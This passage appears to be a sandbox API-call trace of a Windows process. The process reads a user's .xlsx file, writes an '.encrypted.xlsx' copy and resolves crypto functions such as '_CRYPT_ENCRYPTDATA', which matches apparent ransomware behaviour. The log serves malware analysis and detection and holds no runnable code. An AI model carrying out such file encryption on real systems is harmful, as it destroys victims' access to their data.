halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k\\ggg2vkusl20.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0033.890] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0033.890] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0033.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0033.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0033.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0033.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0033.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0033.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0033.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0033.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0033.890] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0033.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0033.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0033.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0033.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0033.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0033.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0033.890] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.890] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0033.890] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0033.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0033.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0033.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0033.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0033.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0033.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0033.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0033.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0033.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0033.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0033.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0033.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0033.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0033.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0033.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0033.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0033.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0033.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0033.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0033.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0033.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0033.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0033.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0033.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0033.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0033.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0033.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0033.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xf0) returned 0x7c7758 [0033.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0033.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb0) returned 0x7c5758 [0033.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0033.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb0) returned 0x7c56a0 [0033.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c7758 | out: hHeap=0x770000) returned 1 [0033.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0033.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0033.891] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0033.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0033.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0033.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5758 | out: hHeap=0x770000) returned 1 [0033.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0033.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0033.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.892] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0033.892] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc0) returned 0x7c7758 [0033.892] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k")) returned 0x10 [0033.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c7758 | out: hHeap=0x770000) returned 1 [0033.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c56a0 | out: hHeap=0x770000) returned 1 [0033.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0033.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0033.892] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0033.892] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0033.892] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0033.892] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0033.892] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0033.892] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\GGg2Vkusl20.encrypted.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k\\ggg2vkusl20.encrypted.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0033.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0033.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0033.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0033.893] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0033.893] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0033.893] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0033.893] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0033.893] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0033.893] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0033.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0033.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0033.893] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0033.893] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.893] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0033.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0033.893] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.893] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0033.893] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0033.893] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0033.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0033.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0033.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0033.893] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0033.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0033.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0033.893] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0033.893] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0033.893] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0033.894] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0033.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0033.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0033.894] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0033.894] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0033.894] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x10000, lpOverlapped=0x0) returned 1 [0033.896] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x5bf2, lpOverlapped=0x0) returned 1 [0033.897] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0033.897] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0033.897] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.897] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0033.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0033.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x15bf2) returned 0x955018 [0033.897] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0033.897] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0033.897] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0033.897] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0033.897] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0033.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0033.897] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x15bf2) returned 0x96ac18 [0033.898] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x955018 | out: hHeap=0x770000) returned 1 [0033.898] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.898] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0033.898] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0033.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0033.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0033.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0033.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x15bf2) returned 0x955018 [0033.899] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0033.899] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x955018 | out: hHeap=0x770000) returned 1 [0033.899] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0033.899] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0033.899] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0033.899] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.899] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0033.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0033.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0033.899] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0033.899] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0033.899] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0033.899] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0033.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0033.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0033.899] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0033.899] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.899] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0033.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0033.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da228 [0033.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0033.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0033.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0033.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0033.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x15bf2) returned 0x955018 [0033.899] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0033.899] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da258 [0033.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0033.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0033.900] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0033.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1e8 [0033.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0033.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0033.900] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0033.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1f8 [0033.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0033.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0033.900] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0033.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ce98 [0033.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0033.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0033.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0033.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0033.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0033.900] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x15bf2) returned 0x88ffb0 [0033.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0033.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0033.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0033.901] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0033.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0033.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0033.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0033.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0033.901] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0033.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0033.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0033.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0033.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0033.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0033.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0033.902] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0033.902] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0033.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0033.902] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0033.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0033.902] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0033.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0033.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0033.902] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0033.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0033.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0033.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0033.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0033.902] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0033.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0033.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0033.902] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0033.902] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0033.902] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0033.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0033.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da298 [0033.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0033.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0033.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0033.902] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0033.902] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cce8 [0033.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0033.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0033.903] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0033.903] HeapFree 